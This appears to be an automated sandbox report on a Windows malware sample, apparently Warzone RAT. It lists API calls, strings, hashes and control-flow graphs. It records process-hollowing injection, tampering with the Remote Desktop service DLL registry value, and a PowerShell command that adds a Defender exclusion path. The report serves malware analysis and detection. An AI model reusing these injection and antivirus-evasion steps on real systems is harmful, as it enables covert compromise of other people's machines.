                                                • Opcode ID: c3d1e02d14da2eddb0a7905d087265acb581fe7e752c854f8c579e11f7e302fe
                                                • Instruction ID: ee41a6e26054bff040f486a2fe8a50efbaf53c62fe2c998e29d90c35aae1452c
                                                • Opcode Fuzzy Hash: c3d1e02d14da2eddb0a7905d087265acb581fe7e752c854f8c579e11f7e302fe
                                                • Instruction Fuzzy Hash: 7B115C70A00118ABCB24EFA5C9568EEBB78AF54708B10047FB006B31D1EBB85F45CB98
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040DE51
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 00410FE6
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 0041100A
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                Strings
                                                • ServiceDll, xrefs: 0040DE5F
                                                • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DE2C
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                                • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                • API String ID: 1903904756-387424650
                                                • Opcode ID: 69cdb7d03b35e7e46b7d5f0623e590d8d54d06f11d906f947abb4056c63acd46
                                                • Instruction ID: 7ad04a792a366f4aa54ef19a0ec8d4b44cd364d9f3d079a0fce37a55fba9d951
                                                • Opcode Fuzzy Hash: 69cdb7d03b35e7e46b7d5f0623e590d8d54d06f11d906f947abb4056c63acd46
                                                • Instruction Fuzzy Hash: 37114C31D00108AACB24EBE6C956CEEBB79AF90704B10006FA801B72C1EB785F45CA94
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040D9EA
                                                  • Part of subcall function 00411039: RegSetValueExW.KERNEL32 ref: 00411058
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                Strings
                                                • ServiceDll, xrefs: 0040DA03
                                                • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040D9C2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                                • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                • API String ID: 2854241163-387424650
                                                • Opcode ID: 33979379b4683227e0ec619b837cce125f3521f24e55d7ce72e3e6525def99b9
                                                • Instruction ID: 1a5d0307058eeef04090d9c41a954dd4ac33c1ebcd4837d1df6c387a7730c537
                                                • Opcode Fuzzy Hash: 33979379b4683227e0ec619b837cce125f3521f24e55d7ce72e3e6525def99b9
                                                • Instruction Fuzzy Hash: F2111F71D00118ABCB14EFA2CC96DEFBB79EF94704F40446FE502722D1EB786A85CA64
                                                APIs
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,770113FB,00000000,00413628), ref: 00413008
                                                • WinExec.KERNEL32 ref: 0041304E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateExecFileModuleNameProcess
                                                • String ID: powershell Add-MpPreference -ExclusionPath
                                                • API String ID: 1183730998-2194938034
                                                • Opcode ID: 19fe353fada35a37364561a76d4533d17ec42238865cab846ce3ff7a7c306435
                                                • Instruction ID: c096fa8388d5753e4bd1dcd6f4560e03b64b7c831576f0fd8345149e6e8dd7f2
                                                • Opcode Fuzzy Hash: 19fe353fada35a37364561a76d4533d17ec42238865cab846ce3ff7a7c306435
                                                • Instruction Fuzzy Hash: 9EF062B154025076F22032725CCBFBF5A9CDF99759F04043BF684B55D2EA7C998041BD
                                                APIs
                                                • send.WS2_32(00413CC7,IO@,?,00000000), ref: 00405608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: send
                                                • String ID: IO@$warzone160
                                                • API String ID: 2809346765-39530799
                                                • Opcode ID: 30616ba3d47c78787e6e2656cedf432b5eab89a9dbfb088b6cda85aa1d450a88
                                                • Instruction ID: c1e0b2cfaea86d07842ac6dd019f160f43f9bd064c1ea9b5a9466f7d64858a70
                                                • Opcode Fuzzy Hash: 30616ba3d47c78787e6e2656cedf432b5eab89a9dbfb088b6cda85aa1d450a88
                                                • Instruction Fuzzy Hash: 65018471901008BBDB04EBA5DC42CDEBB6DDF50365B50423EF122721D1EB79AB158AA9

                                                Execution Graph

                                                Execution Coverage:34.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:103
                                                Total number of Limit Nodes:0
                                                execution_graph 2609 445794 2611 4457a0 CreateProcessW 2609->2611 2612 445c04 2611->2612 2483 443dc0 2484 443ddc 2483->2484 2489 444a69 2484->2489 2485 443e90 2522 446851 2485->2522 2490 444c7c 2489->2490 2561 445d80 2490->2561 2492 444e77 2565 446388 2492->2565 2494 444f89 2569 446488 2494->2569 2573 446481 2494->2573 2495 444fc7 2511 445d80 NtReadVirtualMemory 2495->2511 2496 4450f0 2577 4465a0 2496->2577 2581 4465a8 2496->2581 2497 44512c 2517 445d80 NtReadVirtualMemory 2497->2517 2498 4454b4 2509 4465a0 NtWriteVirtualMemory 2498->2509 2510 4465a8 NtWriteVirtualMemory 2498->2510 2499 4455bd 2518 445d80 NtReadVirtualMemory 2499->2518 2500 44560b 2585 4466f9 2500->2585 2589 446700 2500->2589 2501 4456b3 2508 446388 NtResumeThread 2501->2508 2502 445730 2502->2485 2503 44518b 2503->2498 2514 4465a0 NtWriteVirtualMemory 2503->2514 2515 4465a8 NtWriteVirtualMemory 2503->2515 2508->2502 2509->2499 2510->2499 2511->2496 2514->2503 2515->2503 2517->2503 2518->2500 2519 445d80 NtReadVirtualMemory 2519->2492 2521 445d80 NtReadVirtualMemory 2521->2494 2523 446894 2522->2523 2597 4473a8 2523->2597 2601 4473b8 2523->2601 2524 446a4b 2556 4473a8 NtReadVirtualMemory 2524->2556 2557 4473b8 NtReadVirtualMemory 2524->2557 2525 446a8f 2558 446388 NtResumeThread 2525->2558 2526 446b15 2559 4473a8 NtReadVirtualMemory 2526->2559 2560 4473b8 NtReadVirtualMemory 2526->2560 2527 446ba1 2537 446481 VirtualAllocEx 2527->2537 2538 446488 VirtualAllocEx 2527->2538 2528 446bdf 2544 4473a8 NtReadVirtualMemory 2528->2544 2545 4473b8 NtReadVirtualMemory 2528->2545 2529 446d08 2546 4465a0 NtWriteVirtualMemory 2529->2546 2547 4465a8 NtWriteVirtualMemory 2529->2547 2530 446d44 2554 4473a8 NtReadVirtualMemory 2530->2554 2555 4473b8 NtReadVirtualMemory 2530->2555 2531 4470cc 2542 4465a0 NtWriteVirtualMemory 2531->2542 2543 4465a8 NtWriteVirtualMemory 2531->2543 2532 4471d5 2552 4473a8 NtReadVirtualMemory 2532->2552 2553 4473b8 NtReadVirtualMemory 
2532->2553 2533 447223 2539 446700 NtSetContextThread 2533->2539 2540 4466f9 NtSetContextThread 2533->2540 2534 4472cb 2541 446388 NtResumeThread 2534->2541 2535 443ef2 2536 446da3 2536->2531 2548 4465a0 NtWriteVirtualMemory 2536->2548 2549 4465a8 NtWriteVirtualMemory 2536->2549 2537->2528 2538->2528 2539->2534 2540->2534 2541->2535 2542->2532 2543->2532 2544->2529 2545->2529 2546->2530 2547->2530 2548->2536 2549->2536 2552->2533 2553->2533 2554->2536 2555->2536 2556->2525 2557->2525 2558->2526 2559->2527 2560->2527 2562 445da4 2561->2562 2593 446258 2562->2593 2566 4463cc NtResumeThread 2565->2566 2568 444efd 2566->2568 2568->2521 2570 4464cc VirtualAllocEx 2569->2570 2572 446544 2570->2572 2572->2495 2574 4464cc VirtualAllocEx 2573->2574 2576 446544 2574->2576 2576->2495 2578 4465a8 NtWriteVirtualMemory 2577->2578 2580 44668a 2578->2580 2580->2497 2582 4465f1 NtWriteVirtualMemory 2581->2582 2584 44668a 2582->2584 2584->2497 2586 446749 NtSetContextThread 2585->2586 2588 4467c1 2586->2588 2588->2501 2590 446749 NtSetContextThread 2589->2590 2592 4467c1 2590->2592 2592->2501 2594 4462a4 NtReadVirtualMemory 2593->2594 2596 444e33 2594->2596 2596->2519 2598 4473b8 2597->2598 2600 446258 NtReadVirtualMemory 2598->2600 2599 447491 2599->2524 2600->2599 2602 4473dc 2601->2602 2604 446258 NtReadVirtualMemory 2602->2604 2603 447491 2603->2524 2604->2603 2605 4457a0 2606 445830 CreateProcessW 2605->2606 2608 445c04 2606->2608

                                                Control-flow Graph

                                                control_flow_graph 310 4457a0-44585a 312 445860-44589b 310->312 313 445912-445927 310->313 329 4458d3-4458e4 312->329 330 44589d-4458a5 312->330 314 4459d7-4459db 313->314 315 44592d-445973 313->315 317 445a25-445a76 314->317 318 4459dd-445a1f 314->318 333 445975-44597d 315->333 334 4459b1-4459bc 315->334 320 445a7c-445ab7 317->320 321 445b2e-445b40 317->321 318->317 351 445aef-445b00 320->351 352 445ab9-445ac1 320->352 322 445b42-445b5a 321->322 323 445b5d-445b6f 321->323 322->323 327 445b71-445b89 323->327 328 445b8c-445c02 CreateProcessW 323->328 327->328 335 445c04-445c0a 328->335 336 445c0b-445c4c 328->336 345 4458ea-44590a 329->345 337 4458a7-4458b1 330->337 338 4458c8-4458d1 330->338 340 4459a0-4459af 333->340 341 44597f-445989 333->341 353 4459c2-4459d1 334->353 335->336 359 445c63-445c7a 336->359 360 445c4e-445c5d 336->360 342 4458b5-4458c4 337->342 343 4458b3 337->343 338->345 340->353 348 44598d-44599c 341->348 349 44598b 341->349 342->342 354 4458c6 342->354 343->342 345->313 348->348 356 44599e 348->356 349->348 361 445b06-445b26 351->361 357 445ae4-445aed 352->357 358 445ac3-445acd 352->358 353->314 354->338 356->340 357->361 363 445ad1-445ae0 358->363 364 445acf 358->364 368 445c93-445ca3 359->368 369 445c7c-445c88 359->369 360->359 361->321 363->363 366 445ae2 363->366 364->363 366->357 370 445ca5-445cb4 368->370 371 445cba-445cfd 368->371 369->368 370->371 376 445d0d-445d11 371->376 377 445cff-445d03 371->377 379 445d21-445d25 376->379 380 445d13-445d17 376->380 377->376 378 445d05-445d08 call 440420 377->378 378->376 383 445d35 379->383 384 445d27-445d2b 379->384 380->379 382 445d19-445d1c call 440420 380->382 382->379 388 445d36 383->388 384->383 386 445d2d-445d30 call 440420 384->386 386->383 388->388
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 00445BEF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: ce797453196ce4b0f4bcbc5ddcc88c6fe0e4e78ec7440a973262d5903b16037c
                                                • Instruction ID: 6d1cd429dff4a99e4b58ceec535472c2433cd249184ca85d381a6b3d4adf07f6
                                                • Opcode Fuzzy Hash: ce797453196ce4b0f4bcbc5ddcc88c6fe0e4e78ec7440a973262d5903b16037c
                                                • Instruction Fuzzy Hash: 2D02B174E002188FEF24CFA9D885B9DBBB1BF49304F1481AAE419B7351DB34AA85CF55

                                                Control-flow Graph

                                                control_flow_graph 389 445794-44585a 392 445860-44589b 389->392 393 445912-445927 389->393 409 4458d3-4458e4 392->409 410 44589d-4458a5 392->410 394 4459d7-4459db 393->394 395 44592d-445973 393->395 397 445a25-445a76 394->397 398 4459dd-445a1f 394->398 413 445975-44597d 395->413 414 4459b1-4459bc 395->414 400 445a7c-445ab7 397->400 401 445b2e-445b40 397->401 398->397 431 445aef-445b00 400->431 432 445ab9-445ac1 400->432 402 445b42-445b5a 401->402 403 445b5d-445b6f 401->403 402->403 407 445b71-445b89 403->407 408 445b8c-445c02 CreateProcessW 403->408 407->408 415 445c04-445c0a 408->415 416 445c0b-445c4c 408->416 425 4458ea-44590a 409->425 417 4458a7-4458b1 410->417 418 4458c8-4458d1 410->418 420 4459a0-4459af 413->420 421 44597f-445989 413->421 433 4459c2-4459d1 414->433 415->416 439 445c63-445c7a 416->439 440 445c4e-445c5d 416->440 422 4458b5-4458c4 417->422 423 4458b3 417->423 418->425 420->433 428 44598d-44599c 421->428 429 44598b 421->429 422->422 434 4458c6 422->434 423->422 425->393 428->428 436 44599e 428->436 429->428 441 445b06-445b26 431->441 437 445ae4-445aed 432->437 438 445ac3-445acd 432->438 433->394 434->418 436->420 437->441 443 445ad1-445ae0 438->443 444 445acf 438->444 448 445c93-445ca3 439->448 449 445c7c-445c88 439->449 440->439 441->401 443->443 446 445ae2 443->446 444->443 446->437 450 445ca5-445cb4 448->450 451 445cba-445cfd 448->451 449->448 450->451 456 445d0d-445d11 451->456 457 445cff-445d03 451->457 459 445d21-445d25 456->459 460 445d13-445d17 456->460 457->456 458 445d05-445d08 call 440420 457->458 458->456 463 445d35 459->463 464 445d27-445d2b 459->464 460->459 462 445d19-445d1c call 440420 460->462 462->459 468 445d36 463->468 464->463 466 445d2d-445d30 call 440420 464->466 466->463 468->468
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 00445BEF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 11f05f5cf0e15e39b4c63a0b3511e5af0f5ff8790ccb2779496b1531feda6cdd
                                                • Instruction ID: 48b3ff5a41c8a3491c16cb03faa6cab3f3eddffbb87c08f6d6fa8502d734a693
                                                • Opcode Fuzzy Hash: 11f05f5cf0e15e39b4c63a0b3511e5af0f5ff8790ccb2779496b1531feda6cdd
                                                • Instruction Fuzzy Hash: C2F1C1B4D002188FEF24CFA9D885B9DBBB1BF49304F1481AAE419B7351D738AA85CF55

                                                Control-flow Graph

                                                control_flow_graph 618 4465a0-446610 621 446627-446688 NtWriteVirtualMemory 618->621 622 446612-446624 618->622 624 446691-4466e3 621->624 625 44668a-446690 621->625 622->621 625->624
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 00446678
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 1f4e656cd16370df01b3a5440de1b7e7a17f0a5d16782b3f4978ffec179df5d9
                                                • Instruction ID: c9247e50e9981453ca2dae363d4b2b5401bafea7ca47974f94f70a9ec5b2c9db
                                                • Opcode Fuzzy Hash: 1f4e656cd16370df01b3a5440de1b7e7a17f0a5d16782b3f4978ffec179df5d9
                                                • Instruction Fuzzy Hash: 3241CEB5D012589FDF00CFA9D984AEEFBF1BF49314F24902AE818B7250D339AA45CB54

                                                Control-flow Graph

                                                control_flow_graph 630 4465a8-446610 632 446627-446688 NtWriteVirtualMemory 630->632 633 446612-446624 630->633 635 446691-4466e3 632->635 636 44668a-446690 632->636 633->632 636->635
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 00446678
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 659a1f01fbbe52c155bea08385a931e443dfc46cac78789d5404fac43b38ba99
                                                • Instruction ID: 8a4652927a0f50ade787c663f8f63580e71f8a308df8f7d891624487b32caee0
                                                • Opcode Fuzzy Hash: 659a1f01fbbe52c155bea08385a931e443dfc46cac78789d5404fac43b38ba99
                                                • Instruction Fuzzy Hash: 9441ACB5D012589FDF00CFA9D984AEEFBF1BF49310F24942AE818B7250D379AA45CB54

                                                Control-flow Graph

                                                control_flow_graph 641 446258-44631a NtReadVirtualMemory 644 446323-446375 641->644 645 44631c-446322 641->645 645->644
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0044630A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 787bbb16a00e59fc83cef6b10fa9063d9f3a7404fb509848a70ebcd03fb615d9
                                                • Instruction ID: 4afc008821ab07ef949d63ee799435579aaa80c41bb017a823b77d7b4f897184
                                                • Opcode Fuzzy Hash: 787bbb16a00e59fc83cef6b10fa9063d9f3a7404fb509848a70ebcd03fb615d9
                                                • Instruction Fuzzy Hash: 5041BDB5D002589FDF10CFA9D884AEEFBB1BF49310F10942AE814B7250D739AA45CF69

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 668 4466f9-446760 670 446777-4467bf NtSetContextThread 668->670 671 446762-446774 668->671 673 4467c1-4467c7 670->673 674 4467c8-446814 670->674 671->670 673->674
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 004467AF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: b87119afb26671b0ab400ca918d77e503802edb7359bf36b98ade5401ee952d2
                                                • Instruction ID: d248d630b978b88924bd26765e826afb62a5142c95cb443e6a590a094e2f533a
                                                • Opcode Fuzzy Hash: b87119afb26671b0ab400ca918d77e503802edb7359bf36b98ade5401ee952d2
                                                • Instruction Fuzzy Hash: 6841BDB5D002589FDB10CFA9D884AEEBBF1AF89314F24802AE418B7250D738AA45CF54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 679 446700-446760 681 446777-4467bf NtSetContextThread 679->681 682 446762-446774 679->682 684 4467c1-4467c7 681->684 685 4467c8-446814 681->685 682->681 684->685
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 004467AF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 20398ab73389aebf5d467d15ec2aa16569654469df7270f544a97867afb8782d
                                                • Instruction ID: 67c58265330236a860f7fd2dd4dc2b9054463ef373fd221969b362c809cece66
                                                • Opcode Fuzzy Hash: 20398ab73389aebf5d467d15ec2aa16569654469df7270f544a97867afb8782d
                                                • Instruction Fuzzy Hash: BC31BEB4D002589FDB10CFA9D884AEEFBF1BF49314F24802AE418B7250D778AA45CF55

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 690 446388-446421 NtResumeThread 693 446423-446429 690->693 694 44642a-44646e 690->694 693->694
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 00446411
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: e95c57ce5c77ccb8e3789e2ba8f68c4f3d36c68365ec132e93b15776d5723c4a
                                                • Instruction ID: 40ab92e45871d7c61990b7f6ef7437592f58dcfed57f9a792f4e976ecb1610e7
                                                • Opcode Fuzzy Hash: e95c57ce5c77ccb8e3789e2ba8f68c4f3d36c68365ec132e93b15776d5723c4a
                                                • Instruction Fuzzy Hash: 1E31ACB4D012189FDF10CFA9D884ADEFBB1BF89310F20942AE814B7240D775A945CF99

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 650 446481-446542 VirtualAllocEx 653 446544-44654a 650->653 654 44654b-446595 650->654 653->654
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00446532
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 2a31fef6901b795da0ce407703c7b554e98ecac1b677a0bc3af06dd016f57b40
                                                • Instruction ID: d086ecbc40ce577703e980afa9d155ccad9d75ebcb14046912767071dd2d4404
                                                • Opcode Fuzzy Hash: 2a31fef6901b795da0ce407703c7b554e98ecac1b677a0bc3af06dd016f57b40
                                                • Instruction Fuzzy Hash: AB31ABB5D042589FDF10CFA9E884AEEFBB1BF49310F10942AE814B7210D735A946CF59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 659 446488-446542 VirtualAllocEx 662 446544-44654a 659->662 663 44654b-446595 659->663 662->663
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00446532
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.377007433.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_440000_msimages.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: a1d44352adf40ddf3daaa50b20041af588d4cedb56156ce1fcff29c4181caea5
                                                • Instruction ID: ee509af22d5be5995e7892453ccc4cbf41de8948c9079cfd9ff6e4feae065024
                                                • Opcode Fuzzy Hash: a1d44352adf40ddf3daaa50b20041af588d4cedb56156ce1fcff29c4181caea5
                                                • Instruction Fuzzy Hash: 573189B5D002589FDF10CFA9E884AEEFBB1BF49310F20942AE814B7210D735A946CF59

                                                Execution Graph

                                                Execution Coverage:34.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:133
                                                Total number of Limit Nodes:0
                                                execution_graph 3013 1c5794 3015 1c5830 CreateProcessW 3013->3015 3016 1c5c04 3015->3016 2861 1c57a0 2863 1c5830 CreateProcessW 2861->2863 2864 1c5c04 2863->2864 2865 1c3dc0 2866 1c3ddc 2865->2866 2871 1c4a5d 2866->2871 2867 1c3e90 2912 1c6851 2867->2912 2872 1c4c7c 2871->2872 2953 1c5d80 2872->2953 2958 1c5d71 2872->2958 2873 1c4e33 2896 1c5d80 2 API calls 2873->2896 2897 1c5d71 2 API calls 2873->2897 2874 1c4e77 2963 1c6388 2874->2963 2967 1c6381 2874->2967 2875 1c4efd 2900 1c5d80 2 API calls 2875->2900 2901 1c5d71 2 API calls 2875->2901 2876 1c4f89 2971 1c6488 2876->2971 2975 1c6481 2876->2975 2877 1c4fc7 2910 1c5d80 2 API calls 2877->2910 2911 1c5d71 2 API calls 2877->2911 2878 1c50f0 2979 1c65a0 2878->2979 2983 1c65a8 2878->2983 2879 1c512c 2894 1c5d80 2 API calls 2879->2894 2895 1c5d71 2 API calls 2879->2895 2880 1c54b4 2908 1c65a8 NtWriteVirtualMemory 2880->2908 2909 1c65a0 NtWriteVirtualMemory 2880->2909 2881 1c55bd 2892 1c5d80 2 API calls 2881->2892 2893 1c5d71 2 API calls 2881->2893 2882 1c560b 2987 1c6700 2882->2987 2991 1c66f9 2882->2991 2883 1c56b3 2906 1c6388 NtUnmapViewOfSection 2883->2906 2907 1c6381 NtUnmapViewOfSection 2883->2907 2884 1c5730 2884->2867 2885 1c518b 2885->2880 2890 1c65a8 NtWriteVirtualMemory 2885->2890 2891 1c65a0 NtWriteVirtualMemory 2885->2891 2890->2885 2891->2885 2892->2882 2893->2882 2894->2885 2895->2885 2896->2874 2897->2874 2900->2876 2901->2876 2906->2884 2907->2884 2908->2881 2909->2881 2910->2878 2911->2878 2913 1c6894 2912->2913 3003 1c73b8 2913->3003 3008 1c73a8 2913->3008 2914 1c6a4b 2929 1c73b8 2 API calls 2914->2929 2930 1c73a8 2 API calls 2914->2930 2915 1c6a8f 2931 1c6388 NtUnmapViewOfSection 2915->2931 2932 1c6381 NtUnmapViewOfSection 2915->2932 2916 1c6b15 2933 1c73b8 2 API calls 2916->2933 2934 1c73a8 2 API calls 2916->2934 2917 1c6ba1 2935 1c6488 VirtualAllocEx 2917->2935 2936 1c6481 VirtualAllocEx 2917->2936 2918 1c6bdf 2943 1c73b8 2 API calls 2918->2943 2944 1c73a8 2 API calls 2918->2944 2919 1c6d08 2945 1c65a8 NtWriteVirtualMemory 2919->2945 2946 1c65a0 NtWriteVirtualMemory 2919->2946 2920 1c6d44 2927 1c73b8 2 API calls 2920->2927 2928 1c73a8 2 API calls 2920->2928 2921 1c70cc 2941 1c65a8 NtWriteVirtualMemory 2921->2941 2942 1c65a0 NtWriteVirtualMemory 2921->2942 2922 1c71d5 2951 1c73b8 2 API calls 2922->2951 2952 1c73a8 2 API calls 2922->2952 2923 1c7223 2937 1c66f9 NtSetContextThread 2923->2937 2938 1c6700 NtSetContextThread 2923->2938 2924 1c72cb 2939 1c6388 NtUnmapViewOfSection 2924->2939 2940 1c6381 NtUnmapViewOfSection 2924->2940 2925 1c3ef2 2926 1c6da3 2926->2921 2949 1c65a8 NtWriteVirtualMemory 2926->2949 2950 1c65a0 NtWriteVirtualMemory 2926->2950 2927->2926 2928->2926 2929->2915 2930->2915 2931->2916 2932->2916 2933->2917 2934->2917 2935->2918 2936->2918 2937->2924 2938->2924 2939->2925 2940->2925 2941->2922 2942->2922 2943->2919 2944->2919 2945->2920 2946->2920 2949->2926 2950->2926 2951->2923 2952->2923 2954 1c5da4 2953->2954 2995 1c6258 2954->2995 2999 1c6250 2954->2999 2955 1c5e59 2955->2873 2960 1c5da4 2958->2960 2959 1c5e59 2959->2873 2961 1c6258 NtReadVirtualMemory 2960->2961 2962 1c6250 NtReadVirtualMemory 2960->2962 2961->2959 2962->2959 2964 1c63cc NtUnmapViewOfSection 2963->2964 2966 1c6423 2964->2966 2966->2875 2968 1c63cc NtUnmapViewOfSection 2967->2968 2970 1c6423 2968->2970 2970->2875 2972 1c64cc VirtualAllocEx 